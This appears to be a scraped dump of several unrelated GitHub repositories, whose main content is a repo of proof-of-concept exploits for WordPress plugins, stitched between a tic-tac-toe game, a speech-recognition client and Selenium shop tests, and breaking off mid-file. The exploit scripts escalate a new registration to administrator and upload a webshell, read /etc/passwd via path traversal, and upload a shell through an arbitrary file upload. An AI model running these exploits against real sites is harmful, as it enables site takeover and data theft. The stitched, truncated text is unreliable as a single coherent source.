try again!\")\n\ndef user_menu():\n print(\"===============================\")\n print(\"\\t Main Menu\")\n print(\"===============================\\n\")\n print(\"\\t Your choice\\n\")\n print(\"\\t 1. Play Game\")\n print(\"\\t 2. Display best score\")\n print(\"\\t 3. Exit Game\\n\")\n print(\"===============================\")\n\n while True:\n your_choice = int(input(\"\\nPlease enter your choice : \"))\n if (your_choice > 0 and your_choice < 5):\n if your_choice == 1:\n # ask player's name\n name_player_X = ask_player_name(\"X\")\n level=ask_level()\n print()\n if level.upper() == \"D\":\n x = game_1player_D(name_player_X)\n else:\n x = game_1player_E(name_player_X)\n tot_time_player_X = round(x[0], 2)\n tot_time_player_O = 0\n display_final_result(x[2], name_player_X,tot_time_player_X, tot_time_player_O)\n elif your_choice == 2:\n name_player_score = ask_player_name(\"X\")\n player_X = player(name_player_score)\n print(\"\\n Your best score is : \" + str(player_X.get_best_score(name_player_score)))\n elif your_choice == 3:\n False\n break\n else:\n print(\"\\nINVALID INPUT... Please enter a number between 1 and 3\")\n\n# end of Functions definitions\nimport datetime, os.path, random\n\n# execute Program\nuser_menu()\n" } ]
1
koldbreww/wp-plugins-poc
https://github.com/koldbreww/wp-plugins-poc
8e8c9dbd4e24c27b319f78c35d7d237a2b819f4e
eeb6772ddfc091074366c7ac09bdf7caef4621d5
c46826059595fa7fb0903e82b5785bd2adb7aac8
refs/heads/master
2020-04-17T18:36:13.666230
2019-01-21T16:01:35
2019-01-21T16:01:35
166,833,300
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5799372792243958, "alphanum_fraction": 0.58411705493927, "avg_line_length": 28.030303955078125, "blob_id": "15bd8f688f3507ed806776cf10c48e65d2b1cb55", "content_id": "c352220572beb9e6e1a2182a105f714827aa55a3", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 957, "license_type": "no_license", "max_line_length": 91, "num_lines": 33, "path": "/PoCs/wechat-broadcast/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nfrom urllib import request\n\ndef exploit(host):\n \"\"\" WeChat Broadcast Plugin Exploit PoC\n \n Input: Target Host URL\n Output: URL\n \"\"\"\n \n base_url = host\n print(\"[+] Exploit WeChat Broadcast Plugin @ {}\".format(base_url))\n print(\"[~] Let's check if our target vulnerable plugin is installed.\")\n\n target_url = \"{}/wp-content/plugins/wechat-broadcast/wechat/Image.php\".format(base_url)\n response = request.urlopen(target_url)\n if response.getcode() == 200:\n print(\"[+] Target Exists. Let the exploit begin.\")\n else:\n return False\n \n cmd = \"../../../../../../../../../../etc/passwd\"\n attack_url = \"{}?url={}\".format(target_url, CMD)\n return attack_url\n\n\nif __name__ == \"__main__\":\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))\n print(\"Usage: exploit.py [host]\")" }, { "alpha_fraction": 0.7153598070144653, "alphanum_fraction": 0.7545650005340576, "avg_line_length": 52.228572845458984, "blob_id": "a87c06e35163fbf9c5795b30405b2099d10507f9", "content_id": "d4976acab1be85fc078a5470b547408469e16afa", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 315, "num_lines": 35, "path": "/README.md", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "# WordPress Plugin PoCs\n\nWordPress Plugin PoCs based on 1-Day WordPress Plugin Vulnerability\n\n\n\n## :warning: Legal Disclaimer - Use At Your Own Risk :warning:\n\nThis project is made for EDUCATIONAL and ETHICAL TESTING purposes ONLY. Using of source code in this repository for attacking targets without prior mutual consent is ILLEGAL. \n\nI take **NO** responsibility and/or liability for how you choose to use any of information including source code in this repository. By accessing and using any of files in this repository, you AGREE TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATIONAL and ETHICAL TESTING purposes ONLY.\n\n## List of PoCs\n\n> All PoCs are written in Python 3.6.8\n\n- [WP GDPR Compliance 1.4.2](./PoCs/gdpr-compliance)\n - Vulnerability Type: Remote Code Execution\n - Vulnerable Version: WP GDPR Compliance 1.4.2 or Lower\n - Dependency: [Mailhog](https://github.com/mailhog/MailHog)\n - References:\n - [WordPress WP GDPR Compliance Plugin Privilege Escalation (Rapid7/Metasploit)](https://www.rapid7.com/db/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc)\n - [CVE-2018-19207 (CVE Details)](https://www.cvedetails.com/cve/cve-2018-19207)\n- [Audio Record 1.0](./PoCs/audio-record/exploit.py)\n - Vulnerability Type: Arbitrary File Upload\n - Vulnerable Version: Audio Record 1.0 or Lower\n - References\n - [WordPress Plugin Audio Record 1.0 - Arbitrary File Upload (ExploitDB)](https://www.exploit-db.com/exploits/46055)\n\n- [WeChat Broadcast 1.2.0](./PoCs/wechat-broadcast)\n - Vulnerability Type: Local File Inclusion\n - Vulnerable Version: WeChat Broadcast 1.2.0 or Lower\n - References\n - [CVE-2018-16283 (CVE Details)](https://www.cvedetails.com/cve/CVE-2018-16283/)\n - [WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion (ExploitDB)](https://www.exploit-db.com/exploits/45438)" }, { "alpha_fraction": 0.5972062945365906, "alphanum_fraction": 0.6073963642120361, "avg_line_length": 40.0093879699707, "blob_id": "3a343bfab31a0af01bf2e8ee0553f1882e6881ba", "content_id": "2519d284503444cc8582ef11ba60980964413a50", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8734, "license_type": "no_license", "max_line_length": 154, "num_lines": 213, "path": "/PoCs/gdpr-compliance/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nimport json\nimport hashlib\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import request, parse\n\ndef send_request(queryUrl, data):\n \"\"\" Wrapper for sending a request.\n\n Input: queryUrl (str), data (dict)\n Output: [ response_code (int), response_body (str) ]\n \"\"\"\n try:\n print(\"Send request to {}...\".format(queryUrl))\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n if data is None:\n # GET request (payload == None)\n req = request.Request(queryUrl, headers=headers)\n resp = request.urlopen(req)\n else:\n # POST request (payload != None)\n req = request.Request(queryUrl, headers=headers, data=data.encode(\"utf-8\"))\n resp = request.urlopen(req)\n return [resp.getcode(), resp.read().decode(\"utf-8\")]\n except:\n print(\"[-] Unexpected error while sending a request to {}.\".format(queryUrl))\n return False, []\n\n\ndef exploit(host):\n \"\"\" WP GDPR Compliance Plugin Exploit PoC\n \n Input: Host Address\n Output: URL of Uploaded PHP File\n \"\"\"\n\n NOERROR = '{\"message\":\"\",\"error\":\"\"}' \n baseUrl = host\n print(\"\\nExploit WP GDPR Compliance Plugin @ {}\\n\".format(baseUrl))\n print(\"[~] Let's check if our target vulnerable plugin is installed.\")\n\n # Check if plugin is installed or not\n target_url = \"{}/wp-content/plugins/wp-gdpr-compliance/readme.txt\".format(baseUrl)\n respCode, _ = send_request(target_url, None)\n if respCode is 200:\n print(\"[+] Target Exists. Let the exploit begin.\")\n else:\n print(\"[-] Cannot find target. Please check the plugin installation path.\")\n return False\n\n # Get ajaxSecurity for POST\n respCode, respBody = send_request(baseUrl, None)\n ajaxSecurityVal = \"\"\n if respCode is 200:\n soup = BeautifulSoup(respBody, \"html.parser\")\n for item in soup.findAll(\"script\"):\n if \"ajaxSecurity\" in item.text:\n ajaxSecurityVal = (item.text).split('\"ajaxSecurity\":\"')[1]\n ajaxSecurityVal = ajaxSecurityVal.split('\"')[0]\n else:\n print(\"[-] Not able to access index page.\")\n return False\n\n if ajaxSecurityVal == \"\":\n print(\"[-] Not able to obtain the value of ajaxSecurity.\")\n return False\n\n # Request POST to enable sign up\n queryUrl = \"{}/wp-admin/admin-ajax.php\".format(baseUrl)\n data = 'action=wpgdprc_process_action&security='\n data = data + ajaxSecurityVal\n data = data + '&data={\"type\":\"save_setting\",\"append\":false,\"option\":\"users_can_register\",\"value\":\"1\"}'\n _, respBody = send_request(queryUrl, data)\n if NOERROR in respBody:\n print(\"[+] Successfully set option to anyone can register.\")\n else:\n print(\"[-] Failure to set anyone can register.\")\n return False\n\n # Request POST for signing up as Admin\n queryUrl = \"{}/wp-admin/admin-ajax.php\".format(baseUrl)\n data = \"action=wpgdprc_process_action&security=\"\n data = data + ajaxSecurityVal\n data = data + '&data={\"type\":\"save_setting\",\"append\":false,\"option\":\"default_role\",\"value\":\"administrator\"}'\n _, respBody = send_request(queryUrl, data)\n if NOERROR not in respBody:\n print(\"[-] Failure to set default role as admin.\")\n return False\n print(\"[+] Successfully set option to default role as admin.\")\n\n # Delete all messages in mailhog - Reset SMTP Mail server\n queryUrl = \"http://localhost:8025/api/v1/messages\"\n resp = requests.delete(queryUrl)\n if resp.status_code != 200:\n print(\"[-] Error while removing messages on MailHog\")\n return False\n print(\"[+] Removed all messages on MailHog\")\n \n # Sign up a new user\n queryUrl = \"{}/wp-login.php?action=register\".format(baseUrl)\n data = \"user_login={}&user_email={}&redirect_to=/login&wp-submit=Register\".format(USERNAME, EMAIL)\n respCode, respBody = send_request(queryUrl, data)\n if respCode != 404:\n if \"login_error\" in respBody:\n print(\"[-] There was an error while signing up.\")\n soup = BeautifulSoup(respBody, \"html.parser\")\n errormsg = soup.find(\"div\", {\"id\":\"login_error\"})\n print(errormsg.text)\n return False\n print(\"[+] Successfully registered to target WP Site.\")\n \n # Parse confirmation email to get key from mailhog\n queryUrl = \"http://localhost:8025/api/v1/messages\"\n setpwUrl = \"\"\n setpwKey = \"\"\n respCode, respBody = send_request(queryUrl, None)\n if respCode is 200:\n messages = json.loads(respBody)\n for message in messages:\n if \"Raw\" in message:\n msgRaw = message[\"Raw\"]\n if \"Data\" in msgRaw:\n msgData = msgRaw[\"Data\"]\n if \"To set your password, visit the following address\" in msgData:\n msgData = msgData.split(\"\\r\\n\\r\\n\")\n for data in msgData:\n if (\"login.php\" in data) and (\"action=rp&key=\" in data):\n setpwKey = (data.split(\"key=\")[1]).split(\"&\")[0]\n setpwUrl = data[1:-1]\n else:\n print(\"[-] Cannot find confirmation email from mailhog.\")\n return False\n \n # Exception for key not found error\n if (setpwKey == \"\") or (setpwUrl == \"\"):\n print(\"[-] Cannot retrive password reset URL from mailhog.\")\n return False\n \n print(\"[+] Successfully retrive the reset password page URL from the email.\")\n\n # Reset password with the key obtained from Mailhog\n wphash = hashlib.md5(baseUrl.encode(\"utf-8\")).hexdigest()\n wpcookieKey = \"wp-resetpass-{}\".format(wphash)\n wpcookieVal = \"{}%3A{}\".format(USERNAME, setpwKey)\n queryUrl = \"{}/wp-login.php?action=resetpass\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n cookies = { \n 'wordpress_test_cookie': 'WP+Cookie+check', \n wpcookieKey: wpcookieVal \n }\n data = { \n 'pass1':PASSWORD, \n 'pass1-text':PASSWORD, \n 'pass2':PASSWORD, \n 'rp_key': setpwKey, \n 'wp-submit':'Reset Password'\n }\n resp = requests.post(queryUrl, headers=headers, cookies=cookies, data=data)\n if \"Your password has been reset.\" not in resp.text:\n print(\"[-] Cannot reset password.\")\n return False\n print(\"[+] Successfully reset the password of {}.\".format(USERNAME))\n \n # Login to WP Admin\n queryUrl = \"{}/wp-login.php\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n cookies = { \"wordpress_test_cookie\": \"WP+Cookie+check\" }\n data = {\n \"log\": USERNAME,\n \"pwd\": PASSWORD,\n \"wp-submit\": \"Log In\",\n \"redirected_to\": \"http://localhost:8000/wp-admin/\",\n \"testcookie\": \"1\"\n }\n resp = requests.post(queryUrl, headers=headers, cookies=cookies, data=data)\n if len(resp.history) > 0:\n cookiesLoggedin = resp.history[0].cookies.get_dict()\n else:\n print(\"[-] Cannot find login cookies from history of logging in.\")\n return False\n print(\"[+] Successfully Logged in to WP Admin panel.\")\n\n # Upload webshell thru plugins\n queryUrl = \"{}/wp-admin/plugin-install.php\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n resp = requests.get(queryUrl, headers=headers, cookies=cookiesLoggedin)\n if \"_wpnonce\" in resp.text:\n soup = BeautifulSoup(resp.text, \"html.parser\")\n wpnonce = soup.find(\"input\", {\"name\":\"_wpnonce\"})['value']\n wp_http_referer = soup.find(\"input\", {\"name\":\"_wp_http_referer\"})['value']\n else:\n print(\"[-] Cannot find wpnonce from response text.\")\n return False\n print(\"[+] Successfully retrive wpnonce and wp_http_referer\")\n\n queryUrl = \"{}/wp-admin/update.php?action=upload-plugin\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n fileobj = open(\"wp-shell.zip\", \"rb\")\n data = {\"_wpnonce\":wpnonce, \"_wp_http_referer\":wp_http_referer}\n resp = requests.post(queryUrl, headers=headers, cookies=cookiesLoggedin, data=data, files={\"pluginzip\": (\"wp-shell.zip\", fileobj, 'application/zip')})\n print(\"[+] Successfully upload webshell plugin. Please visit {}/wp-content/plugins/wp-shell/wp-shell.php\".format(baseUrl))\n result_url = \"{}/wp-content/plugins/wp-shell/wp-shell.php\".format(baseUrl)\n return result_url\n\n\nif __name__ == \"__main__\":\n \"\"\" Let's exploit! \"\"\"\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))" }, { "alpha_fraction": 0.7975460290908813, "alphanum_fraction": 0.7990797758102417, "avg_line_length": 58.3636360168457, "blob_id": "f70fc7f4cd0a7905fc8358cc23a5c2c80431738a", "content_id": "e35147006e52ba8de272c905683fd9f2225df085", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 652, "license_type": "no_license", "max_line_length": 315, "num_lines": 11, "path": "/PoCs/README.md", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "# WordPress Plugin PoCs\n\nWordPress Plugin PoCs based on 1-Day WordPress Plugin Vulnerability\n\n\n\n## :warning: Legal Disclaimer - Use At Your Own Risk :warning:\n\nThis project is made for EDUCATIONAL and ETHICAL TESTING purposes ONLY. Using of source code in this repository for attacking targets without prior mutual consent is ILLEGAL. \n\nI take **NO** responsibility and/or liability for how you choose to use any of information including source code in this repository. By accessing and using any of files in this repository, you AGREE TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATIONAL and ETHICAL TESTING purposes ONLY." }, { "alpha_fraction": 0.5432258248329163, "alphanum_fraction": 0.5509677529335022, "avg_line_length": 26.210525512695312, "blob_id": "f2b57a06e4e831e7113601bc0657f90ed3adab8a", "content_id": "962a8391be5f1812572c767bd8d9a5ebadea322e", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 100, "num_lines": 57, "path": "/PoCs/audio-record/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nimport requests\nimport time\nimport math\nimport binascii\nfrom uniqid import uniqid\n\ndef exploit(host):\n \"\"\" Audio Record 1.0 Exploit PoC \n \n Input: Target Host URL\n Output: URL of Uploaded File\n \"\"\"\n\n target_page = \"{}/wp-admin/admin-ajax.php\".format(host)\n\n files = {\n \"audio-blob\": (\n \"blob\",\n WEBSHELL\n )\n }\n\n data = {\n \"audio-filename\":FILENAME,\n \"action\":\"save_record\",\n \"course_id\":\"undefined\",\n \"unit_id\":\"undefined\"\n }\n \n s = requests.Session()\n first_uniqid = uniqid()\n req = s.post(target_page, data=data, files=files)\n second_uniqid = uniqid()\n diff = (int(second_uniqid,16) - int(first_uniqid,16)) * 10\n first_uniqid_int = int(first_uniqid,16)\n content = req.content.decode(\"ascii\")\n \n if content == \"1\":\n for i in range(first_uniqid_int, first_uniqid_int+diff):\n target_url = \"{}/wp-content/uploads/{YEAR}/{MONTH}/{:x}_{}\".format(host,int(i),filename)\n req = s.get(target_url)\n if req.status_code == requests.codes.ok:\n print(\"Target URL: \" + target_url)\n return \"Found\"\n break\n print(\"[-] Cannot find PHP file\")\n else:\n print(\"[-] Error while processing requests.\")\n\nif __name__ == \"__main__\":\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))\n print(\"Usage: exploit.py [host]\")" } ]
5
BanriIkku/kotonoha
https://github.com/BanriIkku/kotonoha
94b506a87d708b36852fe93298a87714b0b4b495
0d4f7a439a6350bb890d61906530462f84423860
5332f5a1f2442dc09979d26e12db0ff326123ae9
refs/heads/master
2020-07-06T00:41:08.543446
2019-09-20T11:08:32
2019-09-20T11:08:32
202,834,187
1
4
BSD-3-Clause
2019-08-17T04:16:14
2019-09-20T11:08:35
2019-10-12T08:20:54
Python
[ { "alpha_fraction": 0.5333333611488342, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 6.5, "blob_id": "715d7fd650ec5ed8c4dbdda2721a6341ae5f0611", "content_id": "a9f506c1be255d7f4e7df7664a02f9b298ff1d47", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15, "license_type": "permissive", "max_line_length": 10, "num_lines": 2, "path": "/Documentation/ReadMe.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n" }, { "alpha_fraction": 0.7133105993270874, "alphanum_fraction": 0.7167235612869263, "avg_line_length": 9.068965911865234, "blob_id": "948c29676578596df99241dda77ad3aa1fd00130", "content_id": "d7d23170239513cd17f637b672922b0122ad53a0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 355, "license_type": "permissive", "max_line_length": 63, "num_lines": 29, "path": "/README.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n\n## About\n\njuliusを使った音声認識アプリ\n\n## Features\n\n1. ローカルのマイクからWavファイルを生成する。\n\n\n## Tools and Assets\n\n\n## Release notes\n\n\n## License and contributions\n\n\n## Getting started for developers\n\n\n## Documentation\n\n## References\n\n[julius-speech/julius](https://github.com/julius-speech/julius)\n\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 34, "blob_id": "fefda349986f6b352fd2b9ffebc7995f8e570183", "content_id": "ec723ddab14d9ca86a74d416ca92489f9cd617b2", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "permissive", "max_line_length": 34, "num_lines": 1, "path": "/Client/python/config.py", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "\nurl = \"http://serverAddress:10500\"\n" }, { "alpha_fraction": 0.7573529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 11.363636016845703, "blob_id": "ccfda788b211d1f0a021839d65a6b5ce307b066e", "content_id": "b5fa4cd70368458e474e223e01ff8532eea6234f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 250, "license_type": "permissive", "max_line_length": 44, "num_lines": 11, "path": "/Client/ReadMe.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n\n# Install\n\nサーバへwaveファイルを送信するため、「requests」ライブラリを使用しています。\n下記のコマンドで「requests」ライブラリを追加してください。\n\n```\npip install requests\n``` " }, { "alpha_fraction": 0.6577540040016174, "alphanum_fraction": 0.6844919919967651, "avg_line_length": 22.25, "blob_id": "13a410f9f0fedc8bc1170b129394b50b63cfe241", "content_id": "f557e8d136550b21e30ebc3e2a6e7250867e1acf", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "permissive", "max_line_length": 40, "num_lines": 8, "path": "/Client/python/localToServer/request.py", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "import requests\nurl = \"http://serverAddress:10500\"\nfiles = {\n 'myFile': open('wavefile.wav', 'rb')\n}\nsession = requests.Session()\nreq = session.post(url, files=files)\nprint(req.text)\n\n" } ]
5
iamgalina/book_store_tests
https://github.com/iamgalina/book_store_tests
9f6e0b2f84bd5f12afc692f7fa063788d952aabd
5d8633c6fdca8e00a045994f7e2e6ec81eeca7bc
89da3a5b50a03a361356ee76b6fdeda0774cd3b0
refs/heads/master
2023-07-24T14:56:43.665159
2021-09-06T08:34:58
2021-09-06T08:34:58
403,333,114
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7079045176506042, "alphanum_fraction": 0.7264721393585205, "avg_line_length": 37.46938705444336, "blob_id": "43d22a4398fbe7ebe4ca4533948803542ff59c55", "content_id": "70a4666586dfcd6d8b0a6754a4c1bb1e028eb593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9627, "license_type": "no_license", "max_line_length": 148, "num_lines": 245, "path": "/shop.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.chrome.options import Options\n\n#блокировка рекламы\npath_to_extension = r'C:\\Users\\Asus\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2\\Extensions\\gighmmpiobklfepjocnamgkkbiglidom\\4.35.0_0'\nchrome_options = Options()\nchrome_options.add_argument('load-extension='+path_to_extension)\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.create_options()\ntime.sleep(10)\ndriver.maximize_window()\ndriver.implicitly_wait(10)\nfirst_tab = driver.window_handles[0]\ndriver.switch_to.window(first_tab)\n\n#отображение страницы товара\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\n\nhtml5_book = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"content\"]/ul/li[3]/a[1]'))\n)\nhtml5_book.click()\nbook_name = driver.find_element(By.CSS_SELECTOR,'#product-181 h1')\nassert book_name.text == 'HTML5 Forms'\ndriver.quit()\n\n#количество товаров в категории\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nhtml_btn = driver.find_element(By.CSS_SELECTOR, '#woocommerce_product_categories-2 .cat-item-19 > a')\nhtml_btn.click()\nassert len(driver.find_elements_by_class_name(\"product\")) == 3\ndriver.quit()\n\n#сортировка товаров\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\n\nsort_actual = driver.find_element(By.CSS_SELECTOR, '[selected=\"selected\"]')\nassert sort_actual.get_attribute('value') == 'menu_order'\nsort = driver.find_element(By.CSS_SELECTOR, '#content select')\nselect = Select(sort)\nselect.select_by_value('price-desc')\n\nsort_actual = driver.find_element(By.CSS_SELECTOR, '[selected=\"selected\"]')\nassert sort_actual.get_attribute('value') == 'price-desc'\ndriver.quit()\n\n#отображение, скидка товара\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nandoid_book = driver.find_element(By.XPATH, '//*[@id=\"content\"]/ul/li[1]/a[1]')\nandoid_book.click()\nold_price = driver.find_element(By.CSS_SELECTOR,\"#product-169 > .summary > div:nth-child(2) > p > del > span\")\nassert old_price.text == \"₹600.00\"\nactual_price = driver.find_element(By.CSS_SELECTOR,\"#product-169 > .summary > div:nth-child(2) > p > ins > span\")\nassert actual_price.text == \"₹450.00\"\nandroid_picture = driver.find_element(By.CSS_SELECTOR, \"#product-169 > div.images > a > img\")\nandroid_picture.click()\nclose_btn = wait.until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"pp_close\"))\n\n)\nclose_btn.click()\n\ndriver.quit()\n\n#проверка цены в корзине\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ncart_items_not_null = WebDriverWait(driver,10).until_not(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'cartcontents'), '0 Items')\n)\ncart_items = driver.find_element(By.CLASS_NAME, 'cartcontents')\nassert cart_items.text == '1 Item'\nsum_amount = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli span.amount')\nprice_in_cart = sum_amount.text\nassert price_in_cart == '₹180.00'\ncart = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\nwait = WebDriverWait(driver, 5)\nwait.until(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'cart-subtotal'), price_in_cart)\n)\n#этот тест не прходит для России, т.к. есть комиссия\n# wait.until(\n# EC.text_to_be_present_in_element((By.CLASS_NAME, 'order-total'), price_in_cart)\n# )\n\ndriver.quit()\n\n# работа в корзине\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\ndriver.execute_script('window.scrollBy(0,300);')\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ntime.sleep(3)\nJS_DSaA_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"180\"]')\nJS_DSaA_add_btn.click()\ntime.sleep(3)\ncart = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\ntime.sleep(5)\ndelete_first_item = driver.find_element(By.CSS_SELECTOR, '#page-34 tbody>.cart_item:nth-child(1)>.product-remove>a')\ndelete_first_item.click()\nundo_btn = driver.find_element(By.CSS_SELECTOR, '#page-34 .woocommerce-message > a')\nundo_btn.click()\nquantity_JS_book = driver.find_element(By.CSS_SELECTOR, '#page-34 tbody > tr:nth-child(1) >.product-quantity input')\nquantity_JS_book.clear()\nquantity_JS_book.send_keys('3')\nupdate_btn = driver.find_element(By.NAME, 'update_cart')\nupdate_btn.click()\nassert quantity_JS_book.get_attribute('value') == '3'\ntime.sleep(3)\napply_coupon_btn = driver.find_element(By.NAME, 'apply_coupon')\napply_coupon_btn.click()\nwait =WebDriverWait(driver,10)\nwarning_msg = wait.until(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'woocommerce'), 'Please enter a coupon code.')\n)\nif warning_msg is not True:\n print('No warning message')\n\ndriver.quit()\n\n#покупка товара\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\ndriver.execute_script('window.scrollBy(0,300);')\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ntime.sleep(3)\ncart = 